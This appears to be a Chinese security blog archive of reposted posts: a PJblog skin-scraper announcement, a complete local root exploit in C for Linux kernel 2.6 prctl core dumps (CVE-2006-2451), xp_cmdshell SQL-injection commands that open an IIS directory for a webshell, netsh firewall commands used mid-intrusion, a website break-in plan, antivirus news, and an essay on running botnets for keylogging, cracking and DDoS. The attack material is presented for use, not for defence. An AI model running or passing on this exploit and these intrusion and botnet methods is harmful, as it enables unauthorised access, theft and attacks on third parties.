PJblog皮肤在线提取工具

注:此文为本人今天在网上搜索PJBLOG3皮肤时发现,非常钦佩站长的编程水平,年龄仅有17岁。这个软件免费,更可贵的是公布了源代码,从他身上我看到了他的胸怀,也看到了国家IT业的未来。
以下为作者原文:
Pjblog GetSkins V1.0 Beta2 主要更新
  1、Ajax显示皮肤内容,能正常使用地址翻页
  2、重新修改CSS适合绝大部分的皮肤
  PJblog皮肤在线提取工具今天正式使用到博客中,经过一个星期的制作终于可以公测了。
  PJblog皮肤在线提取工具:可以抓取大部分pjblog程序的风格,请在目标处填上你所喜欢的风格博客站,在点击抓取后,将自动抓取对方博客正在使用的风格并打包给您!
  制作原因:evio制作完成后不肯提供给我用 只好自己做了
  asp本版一早就做过了。但是受到evio的刺激,提取是做成了Ajax。逛Ajax论坛辛苦啊。本来想整个页面都做成Ajax但是考虑到Ajax翻页不人性化。
  使用了精确提取的方法。所以速度会比evio的稍慢10秒左右。
  软件下载:
下载文件 点击下载PJblog皮肤在线提取工具
      源代码下载:
下载文件 点击下载PJblog皮肤在线提取工具源代码

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/460

Linux Kernel2.6x 本地溢出代码

复制内容到剪贴板程序代码程序代码
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* – dreyer (main PoC code) */
/* – RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling – Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("
Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("
Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);

printf("
Running shell (remember to remove /tmp/sh when finished) …\n");
system("/tmp/sh -p");
}

——————————————————————————————————
保存为:*.c

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/461

SQL注入建立虚拟目录

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
建立虚拟目录win,指向c:\windows\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,

403错误,表示虚拟目录建好了。。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/462

CMD下设置WINDOWS防火墙以及实际用处

先来点简单的,一般我们都是要关闭这个防火墙,用net stop sharedaccess来完成,开启自然是net start sharedaccess,不过这次我却是要开启它,不为别的,搞了一台服务器准备继续渗透,结果被人ddos+Cc,害的我根本什么操作也不能实现,没办法,netstat -an查看下可能攻击的我的ip地址,把里面闹的最凶的几个全部禁止ip了先,主要是要防止cc攻击,因为我要使用数据库.
netsh firewall set portopening ALL 80 HTTP DISABLE CUSTOM 0.0.0.0 这里的0.0.0.0就是 要禁止的ip 开放的话把前面的DISABLE改成ENABLE,由此类推再禁止1433端口对那机器的开放就是: netsh firewall set portopening ALL 1433 MSSQL DISABLE CUSTOM 0.0.0.0 ,这里的ALL是协议类型,可以改成TCP/UDP.
再附录几个命令

netsh firewall show portopening 这个可以查看防火墙的端口设置,
netsh firewall show allowedprogram 查看防火墙放行的程序
netsh firewall delete allowedprogram exp.exe 对exp.exe设置为不被放行状态
netsh firewall add allowedprogram C:\A.exe A ENABLE 添加程序C盘下的A.exe并放行

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/464

黑客网络入侵大型网站的完整思路

注:

1.acunetix web vulnerability Scanner 4 简称AC4

2.另外以下一种方式走的通,就不用往下走了

3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的。

4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右

方法:

1.X-SCAN扫描目标服务器(一般是没有漏洞,收集信息用吧),看看IIS写权限有漏洞吗,用53溢出或者其他0day和溢出工具试试==>手工查看主站漏洞,先用google+阿d批量扫注入,再手工测试漏洞(例如注入,上传,爆库等等),同时用AC4扫(它在注入方面很细致)==获得WEBSHELL==提权获得3389 (也许有时候把第3条放在第一条前,更合理一些,直接嗅探方便些)。

2.用http://www.seologs.comip-domains.html将主站列同服务器反解析域名,旁注,==>获得WEBSHELL==>提权获得3389

=======渗透过程(选择比较近的网段,同一个网关才好嗅探啊)==========

3.用IIS写权限测试80,8080端口整个网段,用Portready扫描53主机溢出(或者其他漏洞溢出)==>如果有写权限主机,那么提权,获得系统权限,如果可以溢出,获得系统权限==>tracert目标主机,是否同一个网关==>得到3389,用CAIN嗅探目标主机80,21,3389等==>获得目标WEBSHELL==>提权获得目标主机3389

4.用Portready扫描同网段3389,80,8080,8000满足3389+80,8000,8080条件的服务器,反解析域名,手工测试漏洞,同时用AC4扫描网站列表==>获得webshell,提权得到系统权限==>tracert目标主机,是否同一个网关==>得到3389,用CAIN嗅探目标主机80,21,3389等==>获得WEBSHELL==>提权获得3389.

5.用Portready扫描同网段80,8000,8080(主机,(除去上一条扫到的3389主机列表),反解析IP,生成列表,手工测试每个网站,同时用AC4扫描网站列表(如果网站有漏洞,获得WEBSHELL==>提权获得3389==>tracert目标主机,是否同一个网关==>cain嗅探目标主机==>获得目标主机WEBSHELL==>提权获得目标主机3389),同时用x-scan扫描同网段所有主机(如果有漏洞,提权得到3389==>tracert目标主机,是否同一个网关==>cain嗅探目标主机==>获得目标主机WEBSHELL==>提权获得目标主机3389)

6.如果以上均没有漏洞,那就选择网段远一点,或者整个网段,返回第3条。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/463

微软免费杀毒软件Morro或将引发免费风潮

     微软公司于近日宣布,他们初定于明年向个人用户提供免费的杀毒软件,而以线上付费模式提供的安全套装杀毒软件即将终止。
  微软此款免费杀毒软件代号为“Morro”,发布日期初定于2009年下半年,随着Morro的推出,Windows Live OneCare也要停止销售。Morro将在网络上免费供人下载,适用系统包括Windows XP、Windows Vista和Windows 7(微软的下一代操作系统)。
  Morro主要用于帮助消费者抵挡病毒、间谍软体、rootkit和木马程序。与Windows Live OneCare相比,Morro缺少OneCare的非安全功能,如打印机分享和自动PC tuneup。不过,Morro占用资源相对较少,因此比较适合资源配置较低的PC。从微软的这一策略也可看出其全面侵占杀软市场的野心。
  低配需求+免费模式,让微软的杀毒软件从一开始就受到高度关注,微软在其Windows Live OneCare Team博客中这样解释自己推出Morro的理由:全球大多数的消费者没有最新的防毒、反间谍软件,和反恶意软件防护。乍一看,微软的行为很有些慈善的意味。但是对于同业竞争者来说,微软此举势必引起他们的恐慌。想想OneCare在市场上引发的降价风潮,Morro也许真的要引发杀毒软件免费时代。
  国际杀软界的巨头面对微软的行动,也表现出了不同的反应。赛门铁克和McAfee截止目前尚未对此发表评论。卡巴斯基表示,有效的杀毒软件需要专业庞大的团队来支撑,而这些成本需要通过各种盈利手段来解决,完全免费的杀毒软件很难运作。金山公司表示,明年他们会尝试通过增值方式来增加收入,金山毒霸全面实施免费仍为时尚早。看起来,各杀毒软件厂商限于产品线单一,都无法承受免费的事实,可是微软有推出免费的天然优势,它具有资金、技术和市场的三大重要因素。
  微软较早认识到经济发展萎靡和个人杀软难以盈利的现实,凭借其强大的资金实力,推出免费杀软以拓展市场,只是这是否会引发垄断官司,实在难以预测,不过微软似乎从来没有惧怕过这些官司。
  微软也就是树大招风而已,其实在杀软界,很多厂商早就推出了免费的产品,如 AVG、AVAST和国内的360等。这些公司均没有招致市场热议,唯独微软得到了普遍的关注,这也许是和微软的国际地位是分不开的。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/it-web-news/465

我是一个渗透手–我不要当肉鸡

0point注:此文相当有思想,极力推荐大家看看,宏观面较强。
By:linzi

交流才不会孤陋寡闻,大家有好的建议可以提出来:D

例子:
我平时找肉鸡都是结合google earth,先定位一下要找的地区,如北京,上海,
HK,TW,KR,JP,USA,东南亚等.

这个时候,再tracert一下就可以把每个地区的骨干网络的拓扑图给画出来,然后
在google地图上玩填空游戏,再接着就开始找肉鸡之行.

这样找出来的肉鸡绝对不会是很次的肉鸡,骨干网络上的肉鸡绝对是一流的,配置是
另一回事,宽带绝对牛B.

当你有了一大堆僵尸网络的时候,可以考虑搭建一个平台.
有点类似于bots管理器.

这个时候你的宏观思想就得用上场了.
第三方程序,操作系统,版本,管理员用户名,数据库用户名等等.

当你收集完这些信息之后就可以开始建立很多平台.

杀毒平台:
假设说,你现在要查你的马是否被杀,你可以很轻松的通过你的平台,找出装了KAV的
有哪些机器,nod32的哪些,小红伞的哪些等等.

这些就是所谓的病毒平台.

调试平台:
这个时候新马出来了,你可以很轻松的找到韩国,中文,日文,英文,2k,2k3,vista
xp等等肉鸡,马上就可以测试出,你的马在哪些环境是ok的,一般这个时候是在虚拟
机调试完后才做这个,否则肉鸡会哗哗的丢,驱动蓝屏太严重了,比芙蓉JJ还恶心..

?蜜罐?平台:
这个时候你可以考虑选择性的给不同类型的机器中上键盘记录,很多时候会收获到
很多的病毒样本,好用的tools,而且可以分析出,其它的黑客的渗透手法,很多时
候,别人的手法比较高明多了,很值得学习.把自己的快乐建立在他人的郁闷上…

分析平台:
不同的地方,不同的操作系统,不同的管理员,不同类型的管理员的操作习惯等,这
些你都可以通过技术手段得到分析报告.当你有了这些报告,渗透不同类型的站,你
就可以很轻松的知道管理员会查哪些,怎么查,以及是否要改变平台的渗透习惯等.
第三方软件的统计也是很有帮助的,你可以知道不同地区的管理员习惯,如韩国人
喜欢用鸡蛋ftp,喜欢用ahnlab,不用winrar,他的密码习惯一般来韩文打成英文等.
这些都是很有用的,如美国佬的pc机都喜欢用quicktime,服务器喜欢装symantec和
卖咖啡的,韩国佬的密码长度一般是12位,中国人搞股票的人的密码习惯,搞IT的
人的密码长度,规则等等…

暴破平台:
看看xmd5的模式就知道了,以肉鸡的形式来保存散列,这个时候,例如说,当你有
很多肉鸡,你可以用来暴破winrar,winzip,office,md5,sha等等,这个要看水平了
网上半成品工具,诸如:xdoor

代理平台:
sslvpn,sslproxy,vpn,等等,发挥你们的想像力吧….
如果你的coding能力够的话,其实可以写出一个很cool的管理软件.
你点一下北京,再点一下上海,再点一下韩国,再点一下米国,这个时候,程序就
会自动化的计算出你手里的肉鸡应该先连接哪台,再连接哪台,然后再以google
earth的形式,像电影式的给列出来,so cool~~~~

DDOS平台:
靠,一看就是大坏蛋…..

其它平台….
发挥你们的想像力吧…..

每次,当我打开google earth的时候,朋友说,我眼睛都绿了,因为我总觉得哗
啦啦的全是肉鸡,全是极品肉鸡,全是vpn…..

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/466